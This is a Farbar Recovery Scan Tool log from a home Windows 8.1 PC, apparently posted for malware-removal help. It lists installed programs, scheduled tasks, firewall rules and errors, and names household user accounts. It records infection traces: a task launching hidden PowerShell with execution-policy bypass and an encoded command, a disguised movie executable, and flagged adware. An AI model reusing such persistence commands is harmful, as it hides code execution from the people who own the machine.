Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by archer (2016-01-01 12:01:22)
Running from C:\Users\archer\Desktop
Windows 8.1 (X64) (2014-12-28 20:00:10)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-4067499190-4158452651-832932472-500 - Administrator - Disabled)
archer (S-1-5-21-4067499190-4158452651-832932472-1001 - Administrator - Enabled) => C:\Users\archer
Guest (S-1-5-21-4067499190-4158452651-832932472-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4067499190-4158452651-832932472-1003 - Limited - Enabled)
joseph.fernandez (S-1-5-21-4067499190-4158452651-832932472-1005 - Limited - Enabled) => C:\Users\joseph.fernandez
melanie.fernandez (S-1-5-21-4067499190-4158452651-832932472-1004 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\uTorrent) (Version: 3.4.5.41202 - BitTorrent Inc.)
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.008.20082 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
AIO_Scan (x32 Version: 130.0.421.000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.0.10 - Citrix Systems, Inc.)
Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
CyberLink PhotoDirector 3 (HKLM-x32\...\InstallShield_{39337565-330E-4ab6-A9AE-AC81E0720B10}) (Version: 3.0.1.4107 - CyberLink Corp.)
DeAlExpreSs (HKLM-x32\...\{25F259ED-12F6-429F-5783-527C3E2F8586}) (Version: - ) <==== ATTENTION
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DJ_AIO_NS_LP_DocCD (x32 Version: 90.0.222.000 - Hewlett-Packard) Hidden
DJ_AIO_ProductContext (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
DJ_AIO_Software (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
DJ_AIO_Software_min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.3.2.2 - Dolby Laboratories Inc)
Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.31 - Lenovo)
Energy Manager (x32 Version: 1.0.0.31 - Lenovo) Hidden
F4100 (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
F4100_Help (x32 Version: 90.0.222.000 - Hewlett-Packard) Hidden
Genesys USB Mass Storage Device (HKLM-x32\...\{959B7F35-2819-40C5-A0CD-3C53B5FCC935}) (Version: 4.3.0.7 - Genesys Logic)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Deskjet All-In-One Software (HKLM\...\{2CB8566A-8EA6-417A-BAB1-1B10A88C79BB}) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Support Solutions Framework (HKLM-x32\...\{FC3C2B77-6800-48C6-A15D-9D1031130C16}) (Version: 11.51.0049 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3345 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.5.1000 - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10240 - Realtek Semiconductor Corp.)
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.)
Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden
Lenovo Photos (HKLM-x32\...\Lenovo Photos) (Version: 4.8.5 - CEWE COLOR AG u Co. OHG)
Lenovo PowerDVD10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5630.52 - CyberLink Corp.)
Lenovo PowerDVD10 (x32 Version: 10.0.5630.52 - CyberLink Corp.) Hidden
Lenovo Reach (HKLM-x32\...\{0B5E0E89-4BCA-4035-BBA1-D1439724B6E2}) (Version: 1.1.0.166 - Stoneware, Inc.)
Lenovo VeriFace (HKLM\...\Lenovo VeriFace) (Version: 5.0.13.5261 - Lenovo)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
MarketResearch (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Maxthon Cloud Browser (HKLM-x32\...\Maxthon3) (Version: 4.1.2.4000 - Maxthon International Limited)
McAfee Internet Security (HKLM-x32\...\MSC) (Version: 13.6.1529 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.)
McAfee SiteAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.194 - McAfee, Inc.)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4779.1002 - Microsoft Corporation)
Microsoft Office Home and Student 2013 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 15.0.4779.1002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 43.0.2 (x86 en-GB) (HKLM-x32\...\Mozilla Firefox 43.0.2 (x86 en-GB)) (Version: 43.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.2.5833 - Mozilla)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4727.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4727.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4727.1003 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 14.2.0.10 - Citrix Systems, Inc.) Hidden
Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.6.0.10525 - CyberLink Corp.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.305 - Qualcomm Atheros Communications)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
Qualcomm Atheros Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.21 - Qualcomm Atheros Inc.)
Rapport (x32 Version: 3.5.1507.99 - Trusteer) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7037 - Realtek Semiconductor Corp.)
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
Self-service Plug-in (x32 Version: 4.2.0.2495 - Citrix Systems, Inc.) Hidden
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
StudioTax 2014 (HKLM-x32\...\{1F0B4BC7-3238-4A02-93F7-4132AD435FFD}) (Version: 10.0.2.0 - BHOK IT Consulting)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.18.0 - Synaptics Incorporated)
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Trusteer Endpoint Protection (HKLM-x32\...\Rapport_msi) (Version: 3.5.1507.99 - Trusteer)
UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden
UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.15 - Lenovo)
UserGuide (x32 Version: 1.0.0.15 - Lenovo) Hidden
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
Windows Driver Package - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo)
Windows Driver Package - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {05731A67-E7AB-4958-9858-49C4B49A5DD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-15] (Google Inc.)
Task: {09E86AA9-B994-41AC-94A1-8930AC867792} - System32\Tasks\PDVDServ Task => C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.EXE [2013-03-08] (CyberLink Corp.)
Task: {2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B} - System32\Tasks\VoiceBook => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION
Task: {3959C21C-7347-4BD6-9B0B-E53839FFF249} - \Superclean -> No File <==== ATTENTION
Task: {4CF9BB19-1551-43DB-935A-93DC83991BD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)
Task: {5FE15D7E-8799-4FD3-BB8F-8B8A8494030D} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-4067499190-4158452651-832932472-1001 => C:\Users\archer\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2015-12-11] (Microsoft Corporation)
Task: {6587BA50-D911-4F40-8783-BBD1EC78BAC0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-15] (Google Inc.)
Task: {751E9581-8112-4207-ACD7-7D28296DAF14} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-10-10] (Synaptics Incorporated)
Task: {95C69000-88C2-493A-8071-75808445C52B} - System32\Tasks\UMonitor Task => C:\windows\SysWOW64\UMonit64.exe [2013-08-05] ()
Task: {A0073F3B-4F83-424B-A76C-038B927AB3CD} - System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\mxup.exe [2013-08-01] (Maxthon International ltd.)
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {D3D31C1B-5E1A-4B02-A9C6-A34C76D24621} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2015-12-15] (Microsoft Corporation)
Task: {E7572325-D375-4BA9-A622-9074B9AE0A78} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)
Task: {EC790E4E-B845-47F2-AF93-507122431F19} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {EF83657C-EF9E-4218-82A9-05747B10DB28} - System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\VoiceBook.job => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-01-04 12:19 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2013-09-07 03:48 - 2013-09-07 03:48 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll
2013-09-07 03:45 - 2013-09-07 03:45 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll
2013-09-07 03:52 - 2013-09-07 03:52 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
2015-09-04 18:54 - 2015-08-31 13:53 - 15127440 ___SH () C:\ProgramData\grint.exe
2015-07-21 16:02 - 2015-07-21 16:02 - 00557056 _____ () C:\Program Files (x86)\Trusteer\Rapport\bin\js32.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows:nlsPreferences

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 08:25 - 2015-12-15 21:29 - 00000858 ____A C:\windows\system32\Drivers\etc\hosts
0.0.0.1 mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-4067499190-4158452651-832932472-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\Web\Wallpaper\Lenovo\LenovoWallPaper.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: AtherosSvc => 2
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: HomeNetSvc => 2
MSCONFIG\Services: Intel(R) Capability Licensing Service Interface => 2
MSCONFIG\Services: Intel(R) Capability Licensing Service TCP IP Interface => 3
MSCONFIG\Services: Intel(R) ME Service => 2
MSCONFIG\Services: jhi_service => 2
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: McAfee SiteAdvisor Service => 2
MSCONFIG\Services: mccspsvc => 2
MSCONFIG\Services: McMPFSvc => 2
MSCONFIG\Services: McNaiAnn => 2
MSCONFIG\Services: McODS => 3
MSCONFIG\Services: mcpltsvc => 2
MSCONFIG\Services: McProxy => 2
MSCONFIG\Services: MSK80Service => 2
MSCONFIG\Services: NitroDriverReadSpool8 => 2
MSCONFIG\Services: nlsX86cc => 2
MSCONFIG\Services: VeriFaceSrv => 2
MSCONFIG\Services: ZAtheros Bt and Wlan Coex Agent => 2
HKLM\...\StartupApproved\Run32: => "ConnectionCenter"
HKLM\...\StartupApproved\Run32: => "Redirector"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{3E288B4C-F503-4660-9255-E6B0323AD6F4}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{2580EFB6-F603-4CD6-951A-1C28E3BAFCB9}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{9A537DDB-65B7-4EC6-82F3-884D259177CC}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{537C8ACE-5AED-40ED-8E1C-8F9B2857DE2F}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{D6E34823-7BE8-4C5E-94E3-C68D8216AE59}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{AD4A2BF6-B70C-482D-A6DD-AAEEBA5042CB}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{82172099-59EA-437B-A6E9-C15FB75BA6B4}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD Cinema\PowerDVDCinema10.exe
FirewallRules: [{4C2F8C0D-0702-4C2C-92EE-30CBCF7EA5E1}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{881509AD-ECB4-4D80-934B-FC50C9C3007D}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{05F66C03-0820-47DF-B925-7B3E67E2CE83}] => (Allow) C:\Users\archer\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{536BB3B9-975A-4E85-9AE4-316136E5D756}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{34EBC165-AAAA-4E21-9986-E76D3FDC38D6}] => (Allow) C:\Users\archer\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{15101AD0-6355-41F8-BB36-F3784D945A39}] => (Allow) C:\Users\archer\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{EB2F993D-41E9-4961-9D47-4CE03055988F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{C0CA8D8B-F6C0-4659-9442-E83935F7C4DF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{28A4D00F-F0E4-4269-A988-78DFA2BB32BD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{07E5382D-1227-41A6-BF5F-47C40EEED4C5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{3AE66150-E342-4A56-B423-91C10BF2D8D9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{90DA7392-9395-4F46-9843-E7274B6BF184}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{D2291443-6A79-4DB5-A754-CD5FB9F9AA8F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe
FirewallRules: [{C793B00E-A508-4562-BF67-3AC0C12095A4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{1CEBB8DD-BE9F-4FBD-8295-084413F45FCD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{770C4160-31D0-4984-83A0-7A4196B5DBB5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{F98C8D66-9C42-4A0F-AD99-DD649DBCB948}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{6A40D019-F107-4BB0-B983-59315DEABFB0}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{1E0EA987-F4D3-4B79-99FE-72856E65771E}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{2ACDA006-119A-410F-AF0A-BA5EBC68D033}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2B0E20FE-A008-4E0D-AE3A-0BE604A24471}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{EB849959-AC0F-4DDF-BCDE-BF62FAD72BE1}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6DE61492-03F6-47BD-BA7D-439F624DDAF7}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3F3E1D19-3EFA-490D-A025-97FE3E183CF7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-12-2015 10:21:12 Scheduled Checkpoint
21-12-2015 13:52:16 Installed Rapport
28-12-2015 16:49:23 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/01/2016 10:30:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056
Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1
Exception code: 0xc0000135
Fault offset: 0x0009d4f2
Faulting process id: 0x1480
Faulting application start time: 0xUMonit64.exe0
Faulting application path: UMonit64.exe1
Faulting module path: UMonit64.exe2
Report Id: UMonit64.exe3
Faulting package full name: UMonit64.exe4
Faulting package-relative application ID: UMonit64.exe5

Error: (01/01/2016 10:19:43 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056
Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1
Exception code: 0xc0000135
Fault offset: 0x0009d4f2
Faulting process id: 0x1780
Faulting application start time: 0xUMonit64.exe0
Faulting application path: UMonit64.exe1
Faulting module path: UMonit64.exe2
Report Id: UMonit64.exe3
Faulting package full name: UMonit64.exe4
Faulting package-relative application ID: UMonit64.exe5

Error: (12/31/2015 11:19:37 PM) (Source: System Restore) (EventID: 8200) (User: )
Description: Failed to initiate System Restore (Scheduled Checkpoint).

Error: (12/31/2015 11:05:17 PM) (Source: System Restore) (EventID: 8200) (User: )
Description: Failed to initiate System Restore (Scheduled Checkpoint).

Error: (12/31/2015 11:04:25 PM) (Source: System Restore) (EventID: 8200) (User: )
Description: Failed to initiate System Restore (Scheduled Checkpoint).

Error: (12/31/2015 10:44:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056
Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1
Exception code: 0xc0000135
Fault offset: 0x0009d4f2
Faulting process id: 0xbec
Faulting application start time: 0xUMonit64.exe0
Faulting application path: UMonit64.exe1
Faulting module path: UMonit64.exe2
Report Id: UMonit64.exe3
Faulting package full name: UMonit64.exe4
Faulting package-relative application ID: UMonit64.exe5

Error: (12/31/2015 10:37:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056
Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1
Exception code: 0xc0000135
Fault offset: 0x0009d4f2
Faulting process id: 0xe4
Faulting application start time: 0xUMonit64.exe0
Faulting application path: UMonit64.exe1
Faulting module path: UMonit64.exe2
Report Id: UMonit64.exe3
Faulting package full name: UMonit64.exe4
Faulting package-relative application ID: UMonit64.exe5

Error: (12/31/2015 10:14:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056
Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1
Exception code: 0xc0000135
Fault offset: 0x0009d4f2
Faulting process id: 0xb1c
Faulting application start time: 0xUMonit64.exe0
Faulting application path: UMonit64.exe1
Faulting module path: UMonit64.exe2
Report Id: UMonit64.exe3
Faulting package full name: UMonit64.exe4
Faulting package-relative application ID: UMonit64.exe5

Error: (12/31/2015 10:03:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056
Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1
Exception code: 0xc0000135
Fault offset: 0x0009d4f2
Faulting process id: 0x116c
Faulting application start time: 0xUMonit64.exe0
Faulting application path: UMonit64.exe1
Faulting module path: UMonit64.exe2
Report Id: UMonit64.exe3
Faulting package full name: UMonit64.exe4
Faulting package-relative application ID: UMonit64.exe5

